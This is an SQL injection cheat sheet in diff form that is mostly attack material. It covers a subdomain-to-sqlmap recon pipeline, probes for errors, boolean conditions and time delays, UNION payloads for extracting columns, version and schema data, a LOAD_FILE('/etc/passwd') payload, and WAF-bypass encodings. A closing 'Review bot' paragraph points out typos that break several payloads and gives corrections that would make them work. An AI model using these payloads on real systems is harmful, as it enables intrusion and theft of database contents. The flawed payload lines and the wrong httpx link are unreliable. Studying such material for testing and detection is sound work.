| 1 | +Here are some quick methods to detect the SQL Injection vulnerability, though the methods are not limited. There are various tricks and tools. |
| 2 | + |
| 3 | +1. Using Burpsuite : |
| 4 | + |
| 5 | + 1. Capture the request using burpsuite. |
| 6 | + 2. Send the request to burp scanner. |
| 7 | + 3. Proceed with active scan. |
| 8 | + 4. Once the scan is finished, look for SQL vulnerability that has been detected. |
| 9 | + 5. Manually try SQL injection payloads. |
| 10 | + 6. Use SQLMAP to speed up the process. |
| 11 | + |
| 12 | +2. Using waybackurls and other bunch of tools : |
| 13 | + |
| 14 | + 1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.) |
| 15 | + 2. cat domains | httpx | tee -a alive |
| 16 | + 3. cat alive | waybackurls | tee -a urls |
| 17 | + 4. gf sqli urls >> sqli |
| 18 | + 5. sqlmap -m sqli --dbs --batch |
| 19 | + 6. use tamper scripts |
| 20 | + |
| 21 | +3. Using heuristic scan to get hidden parameters : |
| 22 | + |
| 23 | + 1. Use subdomain enumeration tools on the domain. |
| 24 | + 2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains. |
| 25 | + 3. You can use the same method described above in 2nd point. |
| 26 | + 4. Use Arjun to scan for the hidden params in the urls. |
| 27 | + 5. Use --urls flag to include all urls. |
| 28 | + 6. Check the params as https://domain.com?<hiddenparam>=<value> |
| 29 | + 7. Send request to file and process it through sqlmap. |
| 30 | + |
| 31 | +4. Error generation with untrusted input or special characters : |
| 32 | + |
| 33 | + 1. Submit single quote character ' & look for errors. |
| 34 | + 2. Submit SQL specific query. |
| 35 | + 3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response. |
| 36 | + 4. Submit certain payloads that results in time delay. |
| 37 | + |
| 38 | +5. Finding total number of columns with order by or group by or having : |
| 39 | + |
| 40 | + Submit a series of ORDER BY clause such as |
| 41 | + |
| 42 | + ' ORDER BY 1 -- |
| 43 | + ' ORDER BY 2 -- |
| 44 | + ' ORDER BY 3 -- |
| 45 | + |
| 46 | + and incrementing specified column index until an error occurs. |
| 47 | + |
| 48 | +6. Finding vulnerable columns with union operator : |
| 49 | + |
| 50 | + Submit a series of UNION SELECT payloads. |
| 51 | + |
| 52 | + ' UNION SELECT NULL -- |
| 53 | + ' UNION SELECT NULL, NULL -- |
| 54 | + ' UNION SELECT NULL, NULL, NULL -- |
| 55 | + |
| 56 | + (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.) |
| 57 | + |
| 58 | + To go for the methods in more detail, go through portswigger site. |
| 59 | + |
| 60 | + https://portswigger.net/web-security/sql-injection/union-attacks |
| 61 | + |
| 62 | +7. Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat() |
| 63 | + |
| 64 | + 1. Database version |
| 65 | + |
| 66 | + Oracle SELECT banner FROM v$version |
| 67 | + SELECT version FROM v$instance |
| 68 | + |
| 69 | + Microsoft SELECT @@version |
| 70 | + |
| 71 | + PostgreSQL SELECT version() |
| 72 | + |
| 73 | + MySQL SELECT @@version |
| 74 | + |
| 75 | + 2. Database contents |
| 76 | + |
| 77 | + Oracle SELECT * FROM all_tables |
| 78 | + SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
| 79 | + |
| 80 | + Microsoft SELECT * FROM information_schema.tables |
| 81 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 82 | + |
| 83 | + PostgreSQL SELECT * FROM information_schema.tables |
| 84 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 85 | + |
| 86 | + MySQL SELECT * FROM information_schema.tables |
| 87 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 88 | + |
| 89 | + 3. Shows version, user and database name |
| 90 | + |
| 91 | + ' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database()) |
| 92 | + |
| 93 | + 4. Using group_concat() function, used to concat all the rows of the returned results. |
| 94 | + |
| 95 | + ' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()– |
| 96 | + |
| 97 | +8. Accessing system files with load_file(). and advance exploitation afterwards : |
| 98 | + |
| 99 | + ' UNION ALL SELECT LOAD_FILE ('/ etc / passwd') |
| 100 | + |
| 101 | +9. Bypassing WAF : |
| 102 | + |
| 103 | + 1. Using Null byte before SQL query. |
| 104 | + |
| 105 | + %00' UNION SELECT password FROM Users WHERE username-'xyz'-- |
| 106 | + |
| 107 | + 2. Using SQL inline comment sequence. |
| 108 | + |
| 109 | + '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'-- |
| 110 | + |
| 111 | + 3. URL encoding |
| 112 | + |
| 113 | + for example : |
| 114 | + / URL encoded to %2f |
| 115 | + * URL encoded to %2a |
| 116 | + |
| 117 | + Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work. |
| 118 | + |
| 119 | + 4. Changing Cases (uppercase/lowercase) |
| 120 | + |
| 121 | + For more step wise detailed methods, go through the link below. |
| 122 | + |
| 123 | + https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF |
| 124 | + |
| 125 | + 5. Use SQLMAP tamper scripts. It helps bypass WAF/IDS/IPS. |
| 126 | + |
| 127 | + 1. Use Atlas. It helps suggesting tamper scripts for SQLMAP. |
| 128 | + |
| 129 | + https://github.com/m4ll0k/Atlas |
| 130 | + |
| 131 | + 2. JHaddix post on SQLMAP tamper scripts. |
| 132 | + |
| 133 | + https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423 |
| 134 | + |
| 135 | +10. Time Delays : |
| 136 | + |
| 137 | + Oracle dbms_pipe.receive_message(('a'),10) |
| 138 | + |
| 139 | + Microsoft WAITFOR DELAY '0:0:10' |
| 140 | + |
| 141 | + PostgreSQL SELECT pg_sleep(10) |
| 142 | + |
| 143 | + MySQL SELECT sleep(10) |
| 144 | + |
| 145 | +11. Conditional Delays : |
| 146 | + |
| 147 | + Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual |
| 148 | + |
| 149 | + Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |
| 150 | + |
| 151 | + PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |
| 152 | + |
| 153 | + MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') |
| 154 | + |
| 155 | +12. Resources and tools that will help gain an upper hand on finding bugs : |
| 156 | + |
| 157 | + Portswigger SQL Injection cheat sheet - https://portswigger.net/web-security/sql-injection/cheat-sheet |
| 158 | + |
| 159 | + HTTPX - https://github.com/encode/httpx |
| 160 | + |
| 161 | + GF patterns - https://github.com/1ndianl33t/Gf-Patterns |
| 162 | + |
| 163 | + GF (Tomnomnom)- https://github.com/tomnomnom/gf |
| 164 | + |
| 165 | + We can also use gau with waybackurls to fetch all urls. |
| 166 | + |
| 167 | + Waybackurls - https://github.com/tomnomnom/waybackurls |
| 168 | + |
| 169 | + Gau - https://github.com/lc/gau |
| 170 | + |
| 171 | + Arjun - https://github.com/s0md3v/Arjun |
| 172 | + |
| 173 | + Hakcrawler - https://github.com/hakluke/hakrawler |
| 174 | + |
| 175 | + |
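Review bot: several payload lines in this file contain typos that make them fail as written and should be fixed before the file is used as a reference: line 95 ends with a Unicode en dash (`–`) rather than the `-- ` comment sequence (MySQL also requires the trailing space, or `#`); line 99 has spaces inside the path (`'/ etc / passwd'` should be `'/etc/passwd'`), and it is worth stating there that `LOAD_FILE()` only returns data when the database account holds the FILE privilege and `secure_file_priv` permits the path, which is also the mitigation a reader should take away; line 105 compares with `username-'xyz'` where `=` is clearly intended; and line 109 has `FR/OM`, a single slash that breaks the inline-comment pattern used everywhere else in that string (`FR/**/OM`). Line 91 should also be aligned with sections 5 and 6: a one-column `UNION ALL SELECT` only succeeds when the original query returns exactly one column, so either note that the NULL padding from section 6 applies or pad with placeholder columns and terminate with a comment as line 95 does. In section 12, line 159 links HTTPX to https://github.com/encode/httpx, which is the Python HTTP client library; the pipeline on line 15 (`cat domains | httpx`) relies on the projectdiscovery httpx probing tool (https://github.com/projectdiscovery/httpx), so that link should be corrected. Minor: lines 24 and 173 spell the tool "hakcrawler"/"Hakcrawler" while the linked repository is hakrawler, and the section 7 heading mentions UUID() but no example uses it. Finally, sections 4, 10 and 11 would read less like a bare cheat sheet with one sentence each explaining what is actually being observed (a database error in the response, a differing response for the true and false conditions, or a measurable response delay), since that is what a tester or a detection engineer writing alerts for these probes needs to understand.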